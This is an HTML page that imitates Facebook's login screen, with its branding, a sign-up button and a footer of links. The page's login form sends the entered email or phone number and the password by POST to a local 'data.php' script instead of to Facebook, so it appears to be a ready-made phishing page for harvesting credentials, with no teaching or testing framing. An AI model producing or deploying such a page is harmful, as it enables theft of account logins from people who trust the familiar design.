<!Doctype html>
<html>
<head>
	<title>Facebook Login Page</title>
	<style type="text/css">
	*{
		margin:0px; padding:0px;
	}
	body{
		background:#fff;
		font-family:Arial;
		font-size:14px;
		color: #141823;
	}
	header{
		background:#3a5795;
		color:#fff;
		padding:15px 5px;
	}
	header h2{
		font-size:44px;
	}
	a,
	a:hover,
	a:visited,
	a:active{
		color:#3a5795;
		text-decoration: none;
	}
	header .top{
		width:850px;
		margin: 0px auto;
	}
	.btn{
		padding:3px;
		color:#fff;
		font-weight:bold;
		border-radius:4px;
	}
	.btn-signup{
		background:#6bb933;
		border-color:#3A5795;
	}
	.btn-login{
		width:315px;
		background: #3a5795;
		border:none;
		padding:8px;
		height:45px;
	}
	section{
		background: #e9eaed;
		padding:10px;
	}
	section .center{
		border:1px solid #ccc;
		border-radius:5px;
		background:#fff;
		padding:20px;  
		text-align:center;
		width:500px;
		margin:100px auto;
		font-size:11px; 
	}
	section h3{
		font-size:18px;
		font-weight:lighter;
		margin: 15px 0;
	}
	section p{
		font-size:12px;
		padding:10px 0;
	}
	p{
		margin: 2px o;
	}
	input{
		display:block;
		width:300px;
		margin:10px auto;
		padding:5px;
		height:25px;
		border: 1px solid #d3d6db;
	}
	
	footer{
		font-size:12px;
	}
	footer .bottom{
		width:850px;
		margin:0 auto;
		
	}
	footer p{
		padding:4px 0;
	}
	table{
		border:none;
	}
	tr{
		padding:10px;
	}
	td{
		width:220px;
	}
	
	</style>
</head>
<body>
	<header>
		<div class="top">
			<h2>facebook <button class="btn btn-signup">Sign Up</button></h2>
		</div>

	</header>
		<section>
			<div class="center">
				<h3>Log into Facebook</h3>
				<form action="data.php" method="post">
				<input type="text" name="username" style="font-family: Helvetica, Arial, sans-serif;border: 1px solid #d3d6db;"placeholder="Email address or phone number" />
				<input type="password" name="password"style="font-family: Helvetica, Arial, sans-serif;border: 1px solid #d3d6db;"placeholder="Password" />
				<button class="btn btn-login" type="submit" action="data.php" method="post">Log In</button>
				<p><a href="#">Forgot Password</a> . <a href="#">Sign up for facebook</a></p>
				</form>
				</div>


	</section>
		<footer>
			<div class="bottom">
				<P><a href="#">English (US)&nbsp;&nbsp;more Languages</a></p>
				<hr style="border: 1px solid #d3d6db;"/>
				<p>
				<table>
					<tr>
					<td><a href="#">Sign Up</a></td>
					<td><a href="#">Log In</a></td>
					<td><a href="#">Messsenger</a></td>
					<td><a href="#">Facebook Lite</a></td>
					<td><a href="#">Mobile</a></td>
					<td><a href="#">Friends</a></td>
					<td><a href="#">People</a></td>
					<td><a href="#">Pages</a></td>
					<td><a href="#">Places</a></td>
					<td><a href="#">Games</a></td>
					<td><a href="#">Locations</a></td>
					</tr>
					<tr>
					<td><a href="#">Celebrites</a></td>
					<td><a href="#">Groups</a></td>
					<td><a href="#">Moments</a></td>
					<td><a href="#">Instagram</a></td>
					<td><a href="#">About</a></td>
					<td><a href="#">Create</a></td>
					<td><a href="#">Page</a></td>
					<td><a href="#">Developers</a></td>
					<td><a href="#">Careers</a></td>
					<td><a href="#">Privacy</a></td>
					<td><a href="#">Cookies</a></td>
					</tr>
					<tr>
					<td><a href="#">AdChoices</a></td>
					<td><a href="#">Terms</a></td>
					<td><a href="#">Help</a></td>
					
					
					</tr>
				</table>
				<p>Facebook &copy; 2018</p>
			
			</div>


		</footer>
</body>
</html>